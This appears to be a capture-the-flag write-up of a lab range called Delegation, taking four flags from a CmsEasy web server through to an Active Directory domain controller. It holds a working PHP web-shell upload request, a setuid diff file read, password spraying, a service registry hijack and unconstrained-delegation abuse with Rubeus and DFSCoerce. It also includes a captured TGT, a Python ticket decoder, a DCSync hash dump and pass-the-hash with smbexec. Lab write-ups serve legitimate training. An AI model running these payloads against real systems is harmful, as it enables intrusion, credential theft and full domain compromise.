春秋云境 Delegation

flag01

39.101.173.163:22 open
39.101.173.163:80 open
39.101.173.163:3306 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.101.173.163 code:200 len:68112 title:中文网页标题

Reference: CmsEasy 7.3.8 local file inclusion vulnerability - ListSec. The same template-save endpoint also lets whoever holds the admin session write an arbitrary file, which is what the request below does:

POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.101.173.163
Content-Length: 77
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded;
Cookie: PHPSESSID=os9kli93e59pjclq4361kaairm; loginfalse74c6352c5a281ec5947783b8a186e225=1; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313

sid=#data_d_.._d_.._d_.._d_2.php&slen=693&scontent=<?=eval($_POST["1"]);?>

Once the file is written, browse to /2.php and connect with AntSword (蚁剑). The _d_ tokens in sid are the template handler's substitute for /, so #data_d_.._d_.._d_.._d_2.php walks up out of the template directory and lands 2.php in the web root; the cookie carries the admin login that the endpoint requires.

find / -perm -u=s -type f 2>/dev/null
/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/at
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

Privilege escalation via diff: the binary is setuid root, so it can read any file on the box and print it line by line (the GTFOBins file-read trick). It does not give a root shell, but it is enough to read the flag:

diff --line-format=%L /dev/null /home/flag/flag01.txt


The flag file also contains a hint:

WIN19\Adrian

flag02

The hint names a WIN19 account, so we brute-force it with rockyou. First set up a proxy through the web server and scan the internal network:

172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:21 open
172.22.4.45:139 open
172.22.4.36:80 open
172.22.4.36:3306 open
172.22.4.36:22 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.7:88 open
[*] NetBios: 172.22.4.45 XIAORANG\WIN19
[*] NetInfo:
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetBios: 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetBios: 172.22.4.7 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetInfo:
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] WebTitle: http://172.22.4.36 code:200 len:68100 title:中文网页标题
[*] WebTitle: http://172.22.4.45 code:200 len:703 title:IIS Windows Server
Spraying Adrian with rockyou over SMB turns up:

SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED

STATUS_PASSWORD_EXPIRED means babygirl1 is the right password but it has expired: a valid credential, not a failure. As in earlier ranges, we have to set a new password before we can log on, and the RDP logon screen lets us do that:

proxychains4 rdesktop 172.22.4.45

After changing the password, log in over RDP. On the desktop there is a file describing a risk:


It points at a registry key that our user can modify.


Change the gupdate service's registry entry so that the service launches our payload, then start the service from cmd. Note that execution is time-limited: the Service Control Manager gives the new process about 30 seconds to register as a service and kills it when it does not, so a payload that just runs a shell is gone after 30 seconds. Have the payload spawn or migrate into a separate process instead:

sc start gupdate

The bind shell comes up as SYSTEM and we read the flag:

type c:\Users\Administrator\flag\flag02.txt

flag03

Query the domain for machine accounts with unconstrained delegation. samAccountType 805306369 is SAM_MACHINE_ACCOUNT, and 524288 (0x80000) is the TRUSTED_FOR_DELEGATION bit of userAccountControl, tested with the LDAP bitwise-AND matching rule 1.2.840.113556.1.4.803. Domain controllers always carry that bit, so the DC will be in the output as well; the interesting hit is any other machine:

AdFind -b "DC=xiaorang,DC=lab" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn


WIN19 is in the result, and WIN19 is exactly the host we already control, as SYSTEM. The rest is the standard unconstrained-delegation abuse. First have WIN19 watch for incoming tickets from the DC's machine account (Rubeus monitor needs an elevated context to read tickets from other logon sessions):

Rubeus.exe monitor /interval:2 /filteruser:DC01$ >hash.txt

Then use a forced-authentication primitive, DFSCoerce (MS-DFSNM), to make DC01 authenticate to WIN19. Because WIN19 is trusted for unconstrained delegation, the DC sends a forwarded copy of its own TGT inside the AP-REQ and Rubeus captures it. We authenticate to the DC as the WIN19$ machine account with its NT hash (we are SYSTEM on WIN19, so we have it) and name the listener by hostname, WIN19, rather than by IP, so that the DC uses Kerberos and not NTLM:

python dfscoerce.py -u "WIN19$" -hashes :afd9423130654e89e67dc53032d26928 -d xiaorang.lab WIN19 172.22.4.7

After the coercion, hash.txt contains DC01$'s TGT as a base64 .kirbi. Import it into the current logon session:

Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6KgcRtvscd/DIgXDFIVpBECG+5SBjjdmbEiHmHjAJVi3ZBX6mnDPpfPn5NDZGVO4j0vABRg+aa5U7ZbjceUVDzK24UQK5nE7WJ1YVLHyooOPxpWC2IOAfOGBPmle7HK5JNcyaCaTdASEK04nBwQv1UamoxWNQfOVAZcNKDt3Npg3OOAhHU0HyCdQQXFZkJWs6EnPHGtUm3YGn4rx5NkvjQjCgp2fodDeOyF/cRo4e63hdNA5qvysONb8OnmFdRe0OaH4o4zDNv+aD6Yl45eoAXLLFGe6R3W+9HJetYk/qnQx/GGXPpzhePf24J1xOLWPk3Wv350/AgNYO+/tMU3eGRyfW6sFHOGhZNlWCO5vGgmF9WlGz46+pvZjrFIfMvJ3wQ9U1cUUg9uACgTwARbhNywCWoZg9K7osCmwHM0oKHThVdei1IFPjmRsXBJqMiuhxEcTifAYybrROfvBtA+HPlArE7GFMi6/0EDqzUPEikaUMYuVhGCaG3+S1QeUlNz7T6BML/X7KKQbQUuCjaKy2tFffjetr/41pDQByHT/7hIzNenwrBlwiSiXlF5sPiAq6tVajRmfHpKlTdS9LIygbMaKPSCweJtMrTZVFAOmsyRnWcFgPNacxeCX2htGGdXbA2YNj4rO+kgLWgXz/M0PPMN8GmX5NivuTxXoCmDzarauwrIKFtmFcpAQ/P6L8JP++B3RqyVV2GN9XUXEq6Muf7riTI+IoySRXvqD5pnp0HcHEoeaKjUq24rUbBWTTMQ1SDMaBaKY3rcy79zyKDeYI2v2vhMjRF8lvtNUgW7ix99t0rSCwCSRIwE8mPt3dQAF35HPvMvs0zq253bij2gixCKBLLCHQJHmexBDgggt+GoZwicEUf/QiyZG96YijlyG+odyOCCZ0D927JUpsLK65bhN2IV0oNd3sfjbgwI0ugXfFzTkzrn+qlzd93mW84KeUut5bqsKuc90ymkIqqF9iTGJSlwDqWXOTWOwttcw+/IiMoGJSEctdjZ+6WWSjkhXtXLp5R7QAOJ3zIKyDwnzbCtKmXOAY/tHaUoHHPkEPvWciaf9p1Ap1MKfEGUmp9JsJbveQLfS0SR1hh0xgtDZG6MeMmq1hKGj5V/aeKy5+O4xpJpmrHRTExuJ++aNQbzEQS4xL/cMvRBLwWkLetJRQ3OKr60hPcQPZw43ZTMvAQZc53fGy6aYUSXKD5A6cMEbcEli3QAOl5f8dHm7L40cHcNW2J/nnvcOEdG5cYpg8h7366INTtQeia+gTsI8lFpIuIq6aZkerV3NqX7MD2YHQAD4njpw7Ijhj4wA+3mBCjTOPFRHQI7NwUeLTOw7fEEtK6pT0IsIph6vaEBxQv5H4moKweE2r6eELrooOR8YcxrVA025bSoGH1fxT0nYev5AcYWy+YiM/KAuW80uh2uX8uE7Dwx5GnskjzLUds0iCjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCA7fqNz2H6UReJNgOy2IsNEDG9lAJebzDkz3AJrUqSrm6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI0MDgyMDE2MDIwMVqmERgPMjAyNDA4MjEwMjAyMDFapxEYDzIwMjQwODI3MTYwMjAxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==
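Before feeding a captured blob to ptt it is worth checking that it really is DC01$'s TGT and is still within its lifetime. The Python below is an added example written for this page, not code from the original post or from Rubeus: a minimal DER walker that decodes the .kirbi above. A .kirbi is a KRB-CRED, and Rubeus and mimikatz write its EncKrbCredPart with etype 0, i.e. unencrypted, which is why the client name, ticket flags, lifetime and session-key type are readable without any key. The base64 blob is the one captured in this write-up; the function names and the conditions in tgt_checks are my own choice.

```python
import base64
from datetime import datetime, timezone

# DC01$'s TGT exactly as Rubeus monitor wrote it to hash.txt (the blob above).
KIRBI_B64 = "doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6KgcRtvscd/DIgXDFIVpBECG+5SBjjdmbEiHmHjAJVi3ZBX6mnDPpfPn5NDZGVO4j0vABRg+aa5U7ZbjceUVDzK24UQK5nE7WJ1YVLHyooOPxpWC2IOAfOGBPmle7HK5JNcyaCaTdASEK04nBwQv1UamoxWNQfOVAZcNKDt3Npg3OOAhHU0HyCdQQXFZkJWs6EnPHGtUm3YGn4rx5NkvjQjCgp2fodDeOyF/cRo4e63hdNA5qvysONb8OnmFdRe0OaH4o4zDNv+aD6Yl45eoAXLLFGe6R3W+9HJetYk/qnQx/GGXPpzhePf24J1xOLWPk3Wv350/AgNYO+/tMU3eGRyfW6sFHOGhZNlWCO5vGgmF9WlGz46+pvZjrFIfMvJ3wQ9U1cUUg9uACgTwARbhNywCWoZg9K7osCmwHM0oKHThVdei1IFPjmRsXBJqMiuhxEcTifAYybrROfvBtA+HPlArE7GFMi6/0EDqzUPEikaUMYuVhGCaG3+S1QeUlNz7T6BML/X7KKQbQUuCjaKy2tFffjetr/41pDQByHT/7hIzNenwrBlwiSiXlF5sPiAq6tVajRmfHpKlTdS9LIygbMaKPSCweJtMrTZVFAOmsyRnWcFgPNacxeCX2htGGdXbA2YNj4rO+kgLWgXz/M0PPMN8GmX5NivuTxXoCmDzarauwrIKFtmFcpAQ/P6L8JP++B3RqyVV2GN9XUXEq6Muf7riTI+IoySRXvqD5pnp0HcHEoeaKjUq24rUbBWTTMQ1SDMaBaKY3rcy79zyKDeYI2v2vhMjRF8lvtNUgW7ix99t0rSCwCSRIwE8mPt3dQAF35HPvMvs0zq253bij2gixCKBLLCHQJHmexBDgggt+GoZwicEUf/QiyZG96YijlyG+odyOCCZ0D927JUpsLK65bhN2IV0oNd3sfjbgwI0ugXfFzTkzrn+qlzd93mW84KeUut5bqsKuc90ymkIqqF9iTGJSlwDqWXOTWOwttcw+/IiMoGJSEctdjZ+6WWSjkhXtXLp5R7QAOJ3zIKyDwnzbCtKmXOAY/tHaUoHHPkEPvWciaf9p1Ap1MKfEGUmp9JsJbveQLfS0SR1hh0xgtDZG6MeMmq1hKGj5V/aeKy5+O4xpJpmrHRTExuJ++aNQbzEQS4xL/cMvRBLwWkLetJRQ3OKr60hPcQPZw43ZTMvAQZc53fGy6aYUSXKD5A6cMEbcEli3QAOl5f8dHm7L40cHcNW2J/nnvcOEdG5cYpg8h7366INTtQeia+gTsI8lFpIuIq6aZkerV3NqX7MD2YHQAD4njpw7Ijhj4wA+3mBCjTOPFRHQI7NwUeLTOw7fEEtK6pT0IsIph6vaEBxQv5H4moKweE2r6eELrooOR8YcxrVA025bSoGH1fxT0nYev5AcYWy+YiM/KAuW80uh2uX8uE7Dwx5GnskjzLUds0iCjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCA7fqNz2H6UReJNgOy2IsNEDG9lAJebzDkz3AJrUqSrm6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI0MDgyMDE2MDIwMVqmERgPMjAyNDA4MjEwMjAyMDFapxEYDzIwMjQwODI3MTYwMjAxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg=="

# RFC 4120 TicketFlags, bit positions counted MSB-first as in the BIT STRING.
TICKET_FLAGS = {
    1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy",
    5: "may-postdate", 6: "postdated", 7: "invalid", 8: "renewable",
    9: "initial", 10: "pre-authent", 11: "hw-authent",
    12: "transited-policy-checked", 13: "ok-as-delegate", 14: "anonymous",
    15: "enc-pa-rep",
}


def der_read(buf, pos=0):
    """Read one DER TLV at pos -> (tag, value, next_pos).
    Kerberos never uses multi-byte tags, so one tag octet is enough."""
    tag = buf[pos]
    if (tag & 0x1F) == 0x1F:
        raise ValueError("multi-byte tag at offset %d" % pos)
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: 0x8n, then n length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated element at offset %d" % pos)
    return tag, value, pos + length


def one(buf):
    """Decode exactly one element that fills buf -> (tag, value)."""
    tag, value, end = der_read(buf)
    if end != len(buf):
        raise ValueError("trailing bytes after element")
    return tag, value


def children(buf):
    """Split the content of a constructed element into its child TLVs."""
    out, pos = [], 0
    while pos < len(buf):
        tag, value, pos = der_read(buf, pos)
        out.append((tag, value))
    return out


def ctx(items, n):
    """Content of the context-specific [n] child, or None if absent."""
    for tag, value in items:
        if tag == 0xA0 | n:
            return value
    return None


def as_int(buf):
    return int.from_bytes(one(buf)[1], "big")


def krb_time(s):
    """KerberosTime 'YYYYMMDDhhmmssZ' -> timezone-aware UTC datetime."""
    return datetime.strptime(s, "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)


def principal_name(buf):
    """PrincipalName: [0] name-type, [1] SEQUENCE OF GeneralString -> 'a/b'."""
    parts = children(one(buf)[1])
    return "/".join(v.decode() for _, v in children(one(ctx(parts, 1))[1]))


def ticket_flags(buf):
    _, bits = one(buf)
    unused, bits = bits[0], bits[1:]     # first octet = number of unused trailing bits
    return [TICKET_FLAGS.get(i, "bit%d" % i)
            for i in range(len(bits) * 8 - unused)
            if bits[i // 8] >> (7 - i % 8) & 1]


def parse_kirbi(b64):
    """Decode a Rubeus/mimikatz .kirbi (KRB-CRED): who the first ticket is for,
    which service it is for, its flags, lifetime and session-key etype."""
    tag, body = one(base64.b64decode(b64))
    if tag != 0x76:                                  # [APPLICATION 22] KRB-CRED
        raise ValueError("not a KRB-CRED blob")
    cred = children(one(body)[1])
    if as_int(ctx(cred, 1)) != 22:
        raise ValueError("unexpected msg-type")
    # [2] tickets: SEQUENCE OF Ticket; ptt injects the first one
    tickets = children(one(ctx(cred, 2))[1])
    tkt = children(one(tickets[0][1])[1])            # Ticket = [APPLICATION 1] SEQUENCE
    service = "%s@%s" % (principal_name(ctx(tkt, 2)), one(ctx(tkt, 1))[1].decode())
    # [3] enc-part: EncryptedData; etype 0 means the EncKrbCredPart is in the clear
    enc = children(one(ctx(cred, 3))[1])
    if as_int(ctx(enc, 0)) != 0:
        raise ValueError("EncKrbCredPart is encrypted (etype %d)" % as_int(ctx(enc, 0)))
    tag, ecp = one(one(ctx(enc, 2))[1])              # OCTET STRING holding the DER
    if tag != 0x7D:                                  # [APPLICATION 29] EncKrbCredPart
        raise ValueError("not an EncKrbCredPart")
    infos = children(one(ctx(children(one(ecp)[1]), 0))[1])   # [0] ticket-info
    kci = children(infos[0][1])                      # KrbCredInfo for the first ticket
    key = children(one(ctx(kci, 0))[1])              # [0] key: EncryptionKey
    return {
        "service": service,
        "client": "%s@%s" % (principal_name(ctx(kci, 2)), one(ctx(kci, 1))[1].decode()),
        "flags": ticket_flags(ctx(kci, 3)),
        "starttime": krb_time(one(ctx(kci, 5))[1].decode()),
        "endtime": krb_time(one(ctx(kci, 6))[1].decode()),
        "renew_till": krb_time(one(ctx(kci, 7))[1].decode()),
        "session_key_etype": as_int(ctx(key, 0)),
    }


def tgt_checks(info, now):
    """Reasons (my own list) why ptt of this ticket would not help here."""
    problems = []
    if not info["service"].startswith("krbtgt/"):
        problems.append("not a TGT, service ticket for %s" % info["service"])
    if "forwardable" not in info["flags"]:
        problems.append("not forwardable")
    if now >= info["endtime"]:
        problems.append("expired at %s" % info["endtime"].isoformat())
    return problems


if __name__ == "__main__":
    info = parse_kirbi(KIRBI_B64)
    for k, v in info.items():
        print("%-18s %s" % (k, v))
    print("problems:", tgt_checks(info, datetime.now(timezone.utc)))
```

Run it as a script to print the fields; tgt_checks takes the time to evaluate against, so the same check can be applied to an old hash.txt. The flags list shows forwarded as well as forwardable, which is exactly what a TGT that travelled inside an AP-REQ to an unconstrained-delegation host should look like, and the 10-hour endtime is the reason to use the ticket promptly.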

With DC01$'s TGT in memory we can DCSync, since a DC's machine account holds the directory replication rights:

mimikatz "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

Output:

[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 767e06b9c74fd628dd13785006a9092b 514
1105 Aldrich 98ce19dd5ce74f670d230c7b1aa016d0 512
1106 Marcus b91c7cc463735bf0e599a2d0a04df110 512
1112 WIN-3X7U15C2XDM$ c3ddf0ffd17c48e6c40e6eda9c9fbaf7 4096
1113 WIN-YUUAW2QG9MF$ 125d0e9790105be68deb6002690fc91b 4096
1000 DC01$ 79a05cdbf202947eeb0e56e4f93a806e 532480
500 Administrator 4889f6553239ace1f7c47fa2c619c252 512
1103 FILESERVER$ 5f0f887110fb5c4fd14d34297e8d1dfd 4096
1104 WIN19$ afd9423130654e89e67dc53032d26928 528384

Lateral movement to FILESERVER (172.22.4.19): pass the Administrator NT hash from the dump over SMB:

proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.19 -codec gbk
type c:\users\administrator\flag\flag03.txt

flag04

The same hash works against the DC itself (172.22.4.7):

proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.7 -codec gbk
type c:\users\Administrator\flag\flag04.txt